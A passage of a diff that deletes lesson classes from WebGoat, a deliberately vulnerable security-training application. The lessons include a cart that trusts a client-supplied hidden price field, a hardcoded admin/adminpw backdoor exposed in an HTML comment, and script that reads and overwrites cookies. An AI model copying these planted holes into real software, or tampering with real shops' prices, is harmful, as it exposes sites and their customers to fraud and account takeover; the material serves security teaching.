- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class HiddenFieldTampering extends LessonAdapter
-{
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    private final static String PRICE = "Price";
-
-    private final static String PRICE_TV = "2999.99";
-
-    private final static String PRICE_TV_HACKED = "9.99";
-
-    String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any
-    // interesting exploit!
-    Pattern pattern1 = Pattern.compile(regex);
-    String lineSep = System.getProperty("line.separator");
-    String script = "<SCRIPT>" + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
-            + "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
-            + " document.form." + PRICE + ".value = " + PRICE_TV + ";}" + lineSep + "else document.form.submit();"
-            + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
-
-    /**
-     * Constructor for the HiddenFieldScreen object
-     */
-    public HiddenFieldTampering()
-    {
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(new StringElement(script));
-        float quantity;
-        float total;
-        String price = PRICE_TV;
-        DecimalFormat money = new DecimalFormat("$0.00");
-        try
-        {
-            price = s.getParser().getRawParameter(PRICE, PRICE_TV);
-            quantity = s.getParser().getFloatParameter("QTY", 1.0f);
-            total = quantity * Float.parseFloat(price);
-        } catch (Exception e)
-        {
-            s.setMessage(getLabelManager().get("Invaild data") + this.getClass().getName());
-            price = PRICE_TV;
-            quantity = 1.0f;
-            total = quantity * Float.parseFloat(PRICE_TV);
-
-        }
-
-        if (price.equals(PRICE_TV))
-        {
-            ec.addElement(new Center().addElement(new H1().addElement(getLabelManager().get("ShoppingCart"))));
-            ec.addElement(new BR());
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            TR tr = new TR();
-            tr.addElement(new TH().addElement(getLabelManager().get("ShoppingCartItems")).setWidth("80%"));
-            tr.addElement(new TH().addElement(getLabelManager().get("Price")).setWidth("10%"));
-            tr.addElement(new TH().addElement(getLabelManager().get("Quantity")).setWidth("3%"));
-            tr.addElement(new TH().addElement(getLabelManager().get("Total")).setWidth("7%"));
-            t.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
-            tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1).setSize(6)).setAlign("right"));
-            tr.addElement(new TD().addElement(money.format(total)));
-            t.addElement(tr);
-
-            ec.addElement(t);
-
-            t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            ec.addElement(new BR());
-            tr = new TR();
-            tr.addElement(new TD().addElement(getLabelManager().get("TotalChargedCreditCard")+":"));
-            tr.addElement(new TD().addElement(money.format(total)));
-            tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("UpdateCart"))));
-            tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("Purchase"), "validate()")));
-            t.addElement(tr);
-
-            ec.addElement(t);
-
-            Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
-            ec.addElement(input);
-            ec.addElement(new BR());
-
-        }
-        else
-        {
-            if (!price.toString().equals(PRICE_TV))
-            {
-                makeSuccess(s);
-            }
-
-            ec.addElement(new P().addElement(getLabelManager().get("TotalPriceIs")+":"));
-            ec.addElement(new B("$" + total));
-            ec.addElement(new BR());
-            ec.addElement(new P().addElement(getLabelManager().get("ThisAmountCharged")));
-        }
-
-        return (ec);
-    }
-
-    /**
-     * DOCUMENT ME!
-     * 
-     * @return DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.PARAMETER_TAMPERING;
-    }
-
-    /**
-     * Gets the hints attribute of the HiddenFieldScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        
-        hints.add(getLabelManager().get("HiddenFieldTamperingHint1"));
-        hints.add(getLabelManager().get("HiddenFieldTamperingHint2"));
-        hints.add(getLabelManager().get("HiddenFieldTamperingHint3")+ PRICE_TV +getLabelManager().get("HiddenFieldTamperingHint32") + PRICE_TV_HACKED );
-        
-        return hints;
-    }
-
-    
-
-    private final static Integer DEFAULT_RANKING = new Integer(50);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HiddenFieldScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Exploit Hidden Fields");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/HowToWork.java

@@ -1,89 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Reto Lippuner, Marcel Wirth
- * @created April 4, 2008
- */
-public class HowToWork extends LessonAdapter
-{
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        makeSuccess(s);
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(new StringElement("Welcome to WebGoat !!"));
-        return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the HowToWork object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.INTRODUCTION;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DirectoryScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("How to work with WebGoat");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/HtmlClues.java

@@ -1,240 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.Comment;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created October 28, 2003
- */
-public class HtmlClues extends LessonAdapter
-{
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    /**
-     * Description of the Field
-     */
-    protected final static String PASSWORD = "Password";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String USERNAME = "Username";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    private boolean backdoor(WebSession s)
-    {
-        String username = s.getParser().getRawParameter(USERNAME, "");
-        String password = s.getParser().getRawParameter(PASSWORD, "");
-
-        // <START_OMIT_SOURCE>
-        return (username.equals("admin") && password.equals("adminpw"));
-        // <END_OMIT_SOURCE>
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            // <START_OMIT_SOURCE>
-            ec.addElement(new Comment("FIXME admin:adminpw"));
-            // <END_OMIT_SOURCE>
-            ec.addElement(new Comment("Use Admin to regenerate database"));
-
-            if (backdoor(s))
-            {
-                makeSuccess(s);
-
-                s.setMessage(getLabelManager().get("HtmlCluesBINGO"));
-                ec.addElement(makeUser(s, "admin", "CREDENTIALS"));
-            }
-            else
-            {
-                ec.addElement(makeLogin(s));
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @param user
-     *            Description of the Parameter
-     * @param method
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception Exception
-     *                Description of the Exception
-     */
-    protected Element makeUser(WebSession s, String user, String method) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(new P().addElement(getLabelManager().get("WelcomeUser")+ user));
-        ec.addElement(new P().addElement(getLabelManager().get("YouHaveBeenAuthenticatedWith") + method));
-
-        return (ec);
-    }
-
-    protected Element makeLogin(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(new H1().addElement("Sign In "));
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        TR tr = new TR();
-        tr.addElement(new TH()
-                .addElement(getLabelManager().get("WeakAuthenticationCookiePleaseSignIn"))
-                .setColSpan(2).setAlign("left"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("*"+getLabelManager().get("RequiredFields")).setWidth("30%"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-        t.addElement(tr);
-
-        TR row1 = new TR();
-        TR row2 = new TR();
-        row1.addElement(new TD(new B(new StringElement("*"+getLabelManager().get("UserName")+": "))));
-        row2.addElement(new TD(new B(new StringElement("*"+getLabelManager().get("Password")+": "))));
-
-        Input input1 = new Input(Input.TEXT, USERNAME, "");
-        Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
-        row1.addElement(new TD(input1));
-        row2.addElement(new TD(input2));
-        t.addElement(row1);
-        t.addElement(row2);
-
-        Element b = ECSFactory.makeButton(getLabelManager().get("Login"));
-        t.addElement(new TR(new TD(b)));
-        ec.addElement(t);
-
-        return (ec);
-    }
-
-    /**
-     * Gets the hints attribute of the CluesScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add(getLabelManager().get("HtmlCluesHint1"));
-        hints.add(getLabelManager().get("HtmlCluesHint2"));
-        hints.add(getLabelManager().get("HtmlCluesHint3"));
-        
-        return hints;
-    }
-
-
-
-    private final static Integer DEFAULT_RANKING = new Integer(30);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the category attribute of the FailOpenAuthentication object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.CODE_QUALITY;
-    }
-
-    /**
-     * Gets the title attribute of the CluesScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Discover Clues in the HTML");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/HttpBasics.java

@@ -1,123 +0,0 @@
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Input;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-/**
- * *************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class HttpBasics extends LessonAdapter {
-
-    private final static String PERSON = "person";
-
-    /**
-     * Description of the Method
-     *
-     * @param s Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s) {
-        ElementContainer ec = new ElementContainer();
-
-        StringBuffer person = null;
-        try {
-            ec.addElement(new BR());
-            ec.addElement(new StringElement(getLabelManager().get("EnterYourName") + ": "));
-
-            person = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
-            person.reverse();
-
-            Input input = new Input(Input.TEXT, PERSON, person.toString());
-            ec.addElement(input);
-
-            Element b = ECSFactory.makeButton(getLabelManager().get("Go!"));
-            ec.addElement(b);
-        } catch (Exception e) {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        if (!person.toString().equals("") && getLessonTracker(s).getNumVisits() > 3) {
-            makeSuccess(s);
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     *
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s) {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Type in your name and press 'go'");
-        hints.add("Turn on Show Parameters or other features");
-        hints.add("Try to intercept the request with OWASP ZAP");
-        hints.add("Press the Show Lesson Plan button to view a lesson summary");
-        hints.add("Press the Show Solution button to view a lesson solution");
-
-        return hints;
-    }
-
-    /**
-     * Gets the ranking attribute of the HelloScreen object
-     *
-     * @return The ranking value
-     */
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-    protected Integer getDefaultRanking() {
-        return DEFAULT_RANKING;
-    }
-
-    protected Category getDefaultCategory() {
-        return Category.GENERAL;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     *
-     * @return The title value
-     */
-    public String getTitle() {
-        return ("Http Basics");
-    }
-}

src/main/java/org/owasp/webgoat/lessons/HttpOnly.java

@@ -1,522 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.Date;
-import java.util.List;
-import java.security.MessageDigest;
-import javax.servlet.http.HttpServletResponse;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.WebSession;
-import sun.misc.BASE64Encoder;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class HttpOnly extends LessonAdapter
-{
-
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    private final static Integer DEFAULT_RANKING = new Integer(125);
-
-    private final static String UNIQUE2U = "unique2u";
-
-    private final static String HTTPONLY = "httponly";
-
-    private final static String HTTPONLY_VALUE = "httponly_value";
-
-    private final static String ACTION = "action";
-
-    private final static String READ = "Read Cookie";
-
-    private final static String WRITE = "Write Cookie";
-
-    private final static String READ_RESULT = "read_result";
-
-    private boolean httpOnly = false;
-
-    private boolean readSuccess = false;
-
-    private boolean writeSuccess = false;
-
-    private String original = "undefined";
-
-    /**
-     * Gets the title attribute of the EmailScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("HTTPOnly Test");
-    }
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        String action = null;
-        String http = null;
-
-        http = s.getRequest().getParameter(HTTPONLY);
-        action = s.getRequest().getParameter(ACTION);
-
-        if (http != null)
-        {
-            httpOnly = Boolean.parseBoolean(http);
-        }
-
-        if (httpOnly)
-        {
-            // System.out.println("HttpOnly: Setting HttpOnly for cookie");
-            setHttpOnly(s);
-        }
-        else
-        {
-            // System.out.println("HttpOnly: Removing HttpOnly for cookie");
-            removeHttpOnly(s);
-        }
-
-        if (action != null)
-        {
-            if (action.equals(READ))
-            {
-                handleReadAction(s);
-            }
-            else if (action.equals(WRITE))
-            {
-                handleWriteAction(s);
-            }
-            else
-            {
-                // s.setMessage("Invalid Request. Please try again.");
-            }
-        }
-
-        try
-        {
-            ec.addElement(makeContent(s));
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /**
-     * DOCUMENT ME!
-     * 
-     * @return DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.XSS;
-    }
-
-    /**
-     * Gets the hints attribute of the EmailScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Read the directions and try out the buttons.");
-        return hints;
-    }
-
-    private String createCustomCookieValue()
-    {
-        String value = null;
-        byte[] buffer = null;
-        MessageDigest md = null;
-        BASE64Encoder encoder = new BASE64Encoder();
-
-        try
-        {
-            md = MessageDigest.getInstance("SHA");
-            buffer = new Date().toString().getBytes();
-
-            md.update(buffer);
-            value = encoder.encode(md.digest());
-            original = value;
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-
-        return value;
-    }
-
-    private void setHttpOnly(WebSession s)
-    {
-        String value = createCustomCookieValue();
-        HttpServletResponse response = s.getResponse();
-        String cookie = s.getCookie(UNIQUE2U);
-
-        if (cookie == null || cookie.equals("HACKED"))
-        {
-            response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + "; HttpOnly");
-            original = value;
-        }
-        else
-        {
-            response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + "; HttpOnly");
-            original = cookie;
-        }
-    }
-
-    private void removeHttpOnly(WebSession s)
-    {
-        String value = createCustomCookieValue();
-        HttpServletResponse response = s.getResponse();
-        String cookie = s.getCookie(UNIQUE2U);
-
-        if (cookie == null || cookie.equals("HACKED"))
-        {
-            response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + ";");
-            original = value;
-        }
-        else
-        {
-            response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + ";");
-            original = cookie;
-        }
-    }
-
-    private ElementContainer makeContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        Element r = null;
-        Element hidden_r = null;
-        Table t = null;
-        TR tr = null;
-        Form f = null;
-
-        ec.addElement(new StringElement(getJavaScript()));
-
-        f = new Form();
-
-        t = new Table();
-        t.setWidth(500);
-
-        tr = new TR();
-
-        tr.addElement(new TD(new StringElement("Your browser appears to be: " + getBrowserType(s))));
-        t.addElement(tr);
-
-        tr = new TR();
-        t.addElement(tr);
-
-        tr = new TR();
-
-        tr.addElement(new TD(new StringElement("Do you wish to turn HTTPOnly on?")));
-
-        tr.addElement(new TD(new StringElement("Yes")));
-
-        if (httpOnly == true)
-        {
-            r = new Input(Input.RADIO, HTTPONLY_VALUE, "True").addAttribute("Checked", "true");
-        }
-        else
-        {
-            r = new Input(Input.RADIO, HTTPONLY_VALUE, "True").addAttribute("onClick", "document.form.httponly.click();");
-            hidden_r = new Input(Input.SUBMIT, HTTPONLY, "True").addAttribute("style", "visibility:hidden");
-        }
-
-        tr.addElement(new TD(r));
-
-        tr.addElement(new TD(new StringElement("No")));
-
-        if (httpOnly == false)
-        {
-            r = new Input(Input.RADIO, HTTPONLY_VALUE, "False").addAttribute("Checked", "false");
-        }
-        else
-        {
-            r = new Input(Input.RADIO, HTTPONLY_VALUE, "False").addAttribute("onClick", "document.form.httponly.click();");
-            hidden_r = new Input(Input.SUBMIT, HTTPONLY, "False").addAttribute("style", "visibility:hidden");
-        }
-
-        tr.addElement(new TD(r));
-        tr.addElement(hidden_r);
-
-        r = new Input(Input.HIDDEN, READ_RESULT, "");
-        tr.addElement(r);
-
-        t.addElement(tr);
-
-        /*
-         * tr.addElement(new TD(new StringElement("<strong>Status:</strong> " ))); t.addElement(tr);
-         * if(httpOnly == true) { tr.addElement(new TD(new StringElement("<div
-         * id=\"status\">On</div>"))); } else { tr.addElement(new TD(new StringElement ("<div
-         * id=\"status\">Off</div>"))); } t.addElement(tr); t.addElement(new TR(new TD(new
-         * StringElement("<br/>"))));
-         */f.addElement(t);
-
-        t = new Table();
-        tr = new TR();
-
-        r = new Input(Input.SUBMIT, ACTION, READ).addAttribute("onclick", "myAlert();");
-        tr.addElement(new TD(r));
-
-        r = new Input(Input.SUBMIT, ACTION, WRITE).addAttribute("onclick", "modifyAlert();");
-        tr.addElement(new TD(r));
-        t.addElement(tr);
-
-        f.addElement(t);
-        ec.addElement(f);
-
-        return ec;
-    }
-
-    private void handleReadAction(WebSession s)
-    {
-
-        String displayed = s.getRequest().getParameter(READ_RESULT);
-
-        if (httpOnly == true)
-        {
-            if (displayed.indexOf(UNIQUE2U) != -1)
-            {
-                s.setMessage("FAILURE: Your browser did not enforce the HTTPOnly flag properly for the '" + UNIQUE2U
-                        + "' cookie. It allowed direct client side read access to this cookie.");
-            }
-            else
-            {
-                s.setMessage("SUCCESS: Your browser enforced the HTTPOnly flag properly for the '" + UNIQUE2U
-                        + "' cookie by preventing direct client side read access to this cookie.");
-                if (writeSuccess)
-                {
-                    if (!this.isCompleted(s))
-                    {
-                        makeSuccess(s);
-                        readSuccess = false;
-                        writeSuccess = false;
-                    }
-                }
-                else
-                {
-                    if (!this.isCompleted(s))
-                    {
-                        s.setMessage("Now try to see if your browser protects write access to this cookie.");
-                        readSuccess = true;
-                    }
-                }
-            }
-        }
-        else if (displayed.indexOf(UNIQUE2U) != -1)
-        {
-            s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U
-                    + "' cookie was displayed in the alert dialog.");
-        }
-        else
-        {
-            s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U
-                    + "' cookie should have been displayed in the alert dialog, but was not for some reason. "
-                    + "(This shouldn't happen)");
-        }
-    }
-
-    private void handleWriteAction(WebSession s)
-    {
-        String hacked = s.getCookie(UNIQUE2U);
-
-        if (httpOnly == true)
-        {
-            if (!original.equals(hacked))
-            {
-                s
-                        .setMessage("FAILURE: Your browser did not enforce the write protection property of the HTTPOnly flag for the '"
-                                + UNIQUE2U + "' cookie.");
-                s.setMessage("The " + UNIQUE2U + " cookie was successfully modified to " + hacked
-                        + " on the client side.");
-            }
-            else
-            {
-                s
-                        .setMessage("SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the '"
-                                + UNIQUE2U + "' cookie by preventing client side modification.");
-                if (readSuccess)
-                {
-                    if (!this.isCompleted(s))
-                    {
-                        makeSuccess(s);
-                        readSuccess = false;
-                        writeSuccess = false;
-                    }
-                }
-                else
-                {
-                    if (!this.isCompleted(s))
-                    {
-                        s.setMessage("Now try to see if your browser protects read access to this cookie.");
-                        writeSuccess = true;
-                    }
-                }
-            }
-        }
-        else if (!original.equals(hacked))
-        {
-            s.setMessage("Since HTTPOnly was not enabled, the browser allowed the '" + UNIQUE2U
-                    + "' cookie to be modified on the client side.");
-        }
-        else
-        {
-            s.setMessage("Since HTTPOnly was not enabled, the browser should have allowed the '" + UNIQUE2U
-                    + "' cookie to be modified on the client side, but it was not for some reason. "
-                    + "(This shouldn't happen)");
-        }
-    }
-
-    private String getJavaScript()
-    {
-        StringBuffer buffer = new StringBuffer();
-
-        buffer.append("<script language=\"javascript\">\n");
-        buffer.append("function myAlert() {\n");
-        buffer.append("alert(document.cookie);\n");
-        buffer.append("document.form.read_result.value=document.cookie;\n");
-        buffer.append("return true;\n");
-        buffer.append("}\n");
-        buffer.append("function modifyAlert() {\n");
-        buffer.append("document.cookie='" + UNIQUE2U + "=HACKED;\';\n");
-        buffer.append("alert(document.cookie);\n");
-        buffer.append("return true;\n");
-        buffer.append("}\n");
-        buffer.append("</script>\n");
-
-        return buffer.toString();
-    }
-
-    private String getBrowserType(WebSession s)
-    {
-        int offset = -1;
-        String result = "unknown";
-        String browser = s.getHeader("user-agent").toLowerCase();
-
-        if (browser != null)
-        {
-            if (browser.indexOf("firefox") != -1)
-            {
-                browser = browser.substring(browser.indexOf("firefox"));
-
-                offset = getOffset(browser);
-
-                result = browser.substring(0, offset);
-            }
-            else if (browser.indexOf("msie 6") != -1)
-            {
-                result = "Internet Explorer 6";
-            }
-            else if (browser.indexOf("msie 7") != -1)
-            {
-                result = "Internet Explorer 7";
-            }
-            else if (browser.indexOf("msie") != -1)
-            {
-                result = "Internet Explorer";
-            }
-            else if (browser.indexOf("opera") != -1)
-            {
-                result = "Opera";
-            }
-            else if (browser.indexOf("safari") != -1)
-            {
-                result = "Safari";
-            }
-            else if (browser.indexOf("netscape") != -1)
-            {
-                browser = browser.substring(browser.indexOf("netscape"));
-
-                offset = getOffset(browser);
-
-                result = browser.substring(0, offset);
-            }
-            else if (browser.indexOf("konqueror") != -1)
-            {
-                result = "Konqueror";
-            }
-            else if (browser.indexOf("mozilla") != -1)
-            {
-                result = "Mozilla";
-            }
-        }
-
-        return result;
-    }
-
-    private int getOffset(String s)
-    {
-        int result = s.length();
-
-        for (int i = 0; i < s.length(); i++)
-        {
-            if (s.charAt(i) < 33 || s.charAt(i) > 126)
-            {
-                result = i;
-                break;
-            }
-        }
-
-        return result;
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java

